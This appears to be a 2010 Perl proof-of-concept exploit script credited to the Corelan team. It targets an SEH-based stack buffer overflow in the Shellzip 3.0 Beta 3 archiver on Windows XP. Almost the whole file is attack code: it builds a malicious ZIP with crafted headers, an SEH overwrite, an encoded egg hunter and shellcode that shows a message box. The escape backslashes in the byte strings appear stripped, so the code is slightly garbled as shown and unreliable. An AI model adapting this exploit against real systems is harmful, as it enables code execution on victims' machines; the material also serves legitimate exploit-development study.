#***********************************************************************************
# Exploit Title : Shellzip v3.0 Beta 3 (.zip) 0day Stack Buffer Overflow PoC exploit
# Date          : 16/05/2010
# Author        : Sud0
# Bug found by  : Sud0
# Software Link : http://www.softsea.com/download/ShellZip.html 
# Version       :  3;0 Beta 3
# OS            : Windows
# Tested on     : XP SP3 En (VirtualBox)
# Type of vuln  : SEH
# Thanks to my wife for her support
# Greetz to: Corelan Security Team
# http://www.corelan.be:8800/index.php/security/corelan-team-members/
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# Script provided 'as is', without any warranty.
# Use for educational purposes only.
# Do not use this code to do anything illegal !
# Corelan does not want anyone to use this script
# for malicious and/or illegal purposes
# Corelan cannot be held responsible for any illegal use.
#
# Note : you are not allowed to edit/modify this code.  
# If you do, Corelan cannot be held responsible for any damages this may cause.
#***********************************************************************************
#code :
print "|------------------------------------------------------------------|n";
print "|                         __               __                      |n";
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |n";
print "|  / ___/ __ \/ ___/ _ \/ / __ `/ __ \   / __/ _ \/ __ `/ __ `__ \ |n";
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |n";
print "| \___/\____/_/   \___/_/\__,_/_/ /_/   \__/\___/\__,_/_/ /_/ /_/  |n";
print "|                                                                  |n";
print "|                                       http://www.corelan.be:8800 |n";
print "|                                                                  |n";
print "|-------------------------------------------------[ EIP Hunters ]--|nn";
print "[+] Exploit for .... n";

my $ldf_header = "x50x4Bx03x04x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00" .
"xe4x0f" .# file size: don't change
"x00x00x00";

my $cdf_header = "x50x4Bx01x02x14x00x14x00x00x00x00x00xB7xACxCEx34x00x00x00" .
"x00x00x00x00x00x00x00x00x00".
"xe4x0f". # file size: don't change
"x00x00x00x00x00x00x01x00".
"x24x00x00x00x00x00x00x00";

my $eofcdf_header = "x50x4Bx05x06x00x00x00x00x01x00x01x00".
"x12x10x00x00". # 
"x02x10x00x00". # 
"x00x00";

#Corelan MsgBox
my $shellcode = "w00tw00t" . "xd9xebx9bxd9x74x24xf4x31xd2xb2x7ax31xc9x64x8b". 
"x71x30x8bx76x0cx8bx76x1cx8bx46x08x8bx7ex20x8b".
"x36x38x4fx18x75xf3x59x01xd1xffxe1x60x8bx6cx24".
"x24x8bx45x3cx8bx54x05x78x01xeax8bx4ax18x8bx5a".
"x20x01xebxe3x37x49x8bx34x8bx01xeex31xffx31xc0".
"xfcxacx84xc0x74x0axc1xcfx0dx01xc7xe9xf1xffxff".
"xffx3bx7cx24x28x75xdex8bx5ax24x01xebx66x8bx0c".
"x4bx8bx5ax1cx01xebx8bx04x8bx01xe8x89x44x24x1c".
"x61xc3xb2x08x29xd4x89xe5x89xc2x68x8ex4ex0exec".
"x52xe8x9cxffxffxffx89x45x04xbbx7exd8xe2x73x87".
"x1cx24x52xe8x8bxffxffxffx89x45x08x68x6cx6cx20".
"xffx68x33x32x2ex64x68x75x73x65x72x88x5cx24x0a".
"x89xe6x56xffx55x04x89xc2x50xbbxa8xa2x4dxbcx87".
"x1cx24x52xe8x5exffxffxffx68x6cx61x6ex58x68x63".
"x6fx72x65x31xdbx88x5cx24x07x89xe3x68x64x58x20".
"x20x68x6fx69x74x65x68x65x78x70x6cx31xc9x88x4c".
"x24x09x89xe1x31xd2x52x53x51x52xffxd0x31xc0x50".
"xffx55x08";

my $filename="shellzip.zip";
#Egg Hunter encoded with basereg ESI
my $egg="VYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJI56K1JjYoDOrbpRSZURrxxMtnWLgupZPtxoOH47Tp6Pd4nkyjnOQekZnOpuKWKOxgA";

my $size = 4064;
# Aligne ESI to start of egghunter + Call ESI
my $junk = "AA". $egg ."A" x (224-length($egg))  . 
"x58x58x58" .
"x2Dx3Bx54x55x55".
"x2Dx3Bx54x55x55".
"x2Dx3Cx56x55x55".
"x50x5Ex53x58" . "x98x99";

$junk =$junk . "A" x( 288-length($junk)); # some JUNK

my $nseh = "x74xA8x74x20";
my $seh = "x3Ex4Bx60x00";

my $payload = $junk.$nseh.$seh . "A" x 25 . $shellcode . "B" x (4064-288-25-8-length($shellcode)). ".txt";    

print "Size : " . length($payload)."n";
print "Removing old $filename filen";
system("del $filename");
print "Creating new $filename filen";
open(FILE, ">$filename");

print FILE $ldf_header . $payload . $cdf_header . $payload . $eofcdf_header;
close(FILE);